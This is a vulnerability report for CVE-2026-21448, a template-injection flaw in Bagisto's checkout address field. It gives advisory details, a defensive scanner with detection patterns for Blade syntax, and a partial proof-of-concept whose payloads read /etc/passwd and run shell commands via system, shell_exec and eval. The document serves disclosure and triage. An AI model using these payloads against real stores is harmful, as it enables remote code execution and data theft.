Security Vulnerability Report
CVE-2026-21448 CVSS 9.8 CRITICAL

Published: 2026-01-02 21:15:59
Last Modified: 2026-01-08 21:22:35

Description

Bagisto is an open-source Laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection (CWE-1336). When a normal customer orders any product, they can inject a value in the `add address` step of checkout; the stored value is later evaluated as a template when the order is rendered in the admin view. The issue can lead to remote code execution on the server. Version 2.3.10 contains a patch.

CVSS Details

CVSS v3.1 (Primary)
Score: 9.8 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability sub-score: 3.9, Impact sub-score: 5.9

CVSS v4.0 (Secondary)
Score: 8.9 HIGH
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Exploit maturity: PROOF_OF_CONCEPT

Weakness: CWE-1336 (Improper Neutralization of Special Elements Used in a Template Engine)

Configurations (Affected Products)

cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* - VULNERABLE
Bagisto < 2.3.10
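Two checks a responder wants from the description and the affected-version range above, as one added example that is neither Bagisto's code nor part of the advisory: an affected-version test against the record's `versionEndExcluding` of 2.3.10, and a scan of exported order address fields for Blade template syntax (`{{ }}`, `{!! !!}`, directives, raw PHP tags), since a customer address has no legitimate reason to contain any of it. The record shape and the sample addresses are constructed for the example.

```python
import re

PATCHED_VERSION = (2, 3, 10)  # versionEndExcluding from the NVD record

# Blade template syntax. Matching is deliberately loose to favour recall in
# triage; every hit should be reviewed, not acted on blindly.
TEMPLATE_MARKERS = [
    ("blade_echo", re.compile(r"\{\{.*?\}\}", re.S)),       # {{ expr }}
    ("blade_raw_echo", re.compile(r"\{!!.*?!!\}", re.S)),   # {!! expr !!}
    ("blade_directive", re.compile(r"(?<![\w.])@(?:php|include|inject|extends|verbatim)\b")),
    ("php_tag", re.compile(r"<\?(?:php|=)", re.I)),        # raw PHP open tag
]


def parse_version(version: str) -> tuple:
    """'v2.3.9-beta1' -> (2, 3, 9); missing components count as 0."""
    core = version.strip().lstrip("vV").split("-", 1)[0].split("+", 1)[0]
    try:
        parts = [int(p) for p in core.split(".")]
    except ValueError:
        raise ValueError(f"unparseable version: {version!r}") from None
    return tuple((parts + [0, 0, 0])[:3])


def is_affected(version: str) -> bool:
    """True when the installed Bagisto version is below 2.3.10."""
    return parse_version(version) < PATCHED_VERSION


def find_template_markers(text: str) -> list:
    """Return (marker_name, matched_text) pairs found in one field value."""
    hits = []
    for name, pattern in TEMPLATE_MARKERS:
        for m in pattern.finditer(text or ""):
            hits.append((name, m.group(0)))
    return hits


def scan_orders(orders: list) -> list:
    """Flag orders whose address fields carry template syntax.

    `orders` is a list of dicts with 'id' and 'address' (field -> value),
    the shape an export of the order address table would give you.
    """
    flagged = []
    for order in orders:
        for field, value in order["address"].items():
            if not isinstance(value, str):
                continue
            hits = find_template_markers(value)
            if hits:
                flagged.append({"id": order["id"], "field": field, "hits": hits})
    return flagged


# Constructed sample records (not real customer data): two benign addresses,
# the {{7*7}} probe from the PoC, and a raw-echo command-execution payload.
SAMPLE_ORDERS = [
    {"id": "ORD-1001", "address": {"address1": "Flat 4, Block {A}", "city": "Leeds", "postcode": "LS1 4AP"}},
    {"id": "ORD-1002", "address": {"address1": "{{7*7}} High Street", "city": "Leeds", "postcode": "LS1 4AP"}},
    {"id": "ORD-1003", "address": {"address1": "1 Main St", "city": "{!! shell_exec('id') !!}", "postcode": "12345"}},
    {"id": "ORD-1004", "address": {"address1": "c/o me@example.com", "city": "Austin", "postcode": "73301"}},
]


if __name__ == "__main__":
    for ver in ("2.3.9", "2.3.10", "v2.2.0"):
        print(f"Bagisto {ver}: {'AFFECTED' if is_affected(ver) else 'patched'}")
    for hit in scan_orders(SAMPLE_ORDERS):
        print(f"{hit['id']} {hit['field']}: {hit['hits']}")
```

Run the scan against stored data rather than request logs: the payload is stored at checkout and fires later in the admin view, so the address table is where the evidence persists even after the attacker's session is gone.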

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21448 Bagisto SSTI to RCE PoC
# Affected Version: Bagisto < 2.3.10
import requests

TARGET_URL = "http://target.com"  # Replace with target URL

# Step 1: Register a customer account and log in (a normal customer is all
# the bug needs).
session = requests.Session()
# Login as customer (you need valid credentials)
# login_url = f"{TARGET_URL}/customer/login"
# session.post(login_url, data={"email": "[email protected]", "password": "password"})

# Step 2: Inject an SSTI payload into an address field during checkout.
# Harmless probe: if the stored value is compiled as a Blade template, the
# admin view shows 49 instead of the literal {{7*7}}.
ssti_payload = "{{7*7}}"

# Step 3: The payload fires when an admin opens the order in the admin panel.
# It is evaluated server-side inside the admin's request, so it runs with the
# web server's privileges and its output lands in the admin's page.
#
# RCE payload examples for a Blade template (PHP functions can be called
# directly inside {{ }}):
#   Read /etc/passwd:          {{file_get_contents('/etc/passwd')}}
#   Execute a system command:  {{system('whoami')}}
#   PHP eval() on a base64 blob:
#       {{eval(base64_decode('c3lzdGVtKCJscyIpOw=='))}}   # decodes to: system("ls");
#   Leak the server environment without running a command:
#       {{print_r($_SERVER, true)}}

malicious_payloads = [
    "{{7*7}}",                               # basic SSTI probe
    "{{file_get_contents('/etc/passwd')}}",  # file read
    "{{system($_GET['cmd'])}}#",             # RCE via system(); see caveat below
    "{{shell_exec('id')}}",                  # RCE via shell_exec()
    "{{passthru('cat /etc/hostname')}}",     # RCE via passthru()
]
# Caveat on payload 2: $_GET belongs to the admin's request that renders the
# order, not to the attacker's. Calling TARGET_URL/?cmd=whoami yourself does
# nothing; the command runs only if the admin's own URL carries ?cmd=. For a
# reliable demonstration hard-code the command (payloads 3 and 4).

# Example: add an address carrying the payload
address_data = {
    "address1": malicious_payloads[3],  # RCE payload: shell_exec('id')
    "address2": "",
    "city": "Test City",
    "state": "Test State",
    "country": "US",
    "postal_code": "12345",
}
# Submit address_data through the checkout "add address" step with `session`.
# The endpoint differs between Bagisto releases; capture it from the
# storefront's own checkout request rather than guessing it.

print("[+] CVE-2026-21448 Bagisto SSTI PoC")
print("[+] Payload: {}".format(address_data["address1"]))
print("[+] Note: the payload executes only when an admin views the order in the admin panel")

References

https://github.com/bagisto/bagisto/security/advisories/GHSA-5j4h-4f72-qpm6 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21448", "sourceIdentifier": "[email protected]", "published": "2026-01-02T21:15:59.053", "lastModified": "2026-01-08T21:22:34.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection. When a normal customer orders any product, in the `add address` step they can inject a value to run in admin view. The issue can lead to remote code execution. Version 2.3.10 contains a patch."}, {"lang": "es", "value": "Bagisto es una plataforma de comercio electrónico laravel de código abierto. Las versiones anteriores a la 2.3.10 son vulnerables a la inyección de plantillas del lado del servidor. Cuando un cliente normal pide cualquier producto, en el paso 'añadir dirección' pueden inyectar un valor para ejecutar en la vista de administrador. El problema puede llevar a la ejecución remota de código. La versión 2.3.10 contiene un parche."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.10", "matchCriteriaId": "E9A19FD0-5100-48D6-BBB3-5A4CA1D90593"}]}]}], "references": [{"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-5j4h-4f72-qpm6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}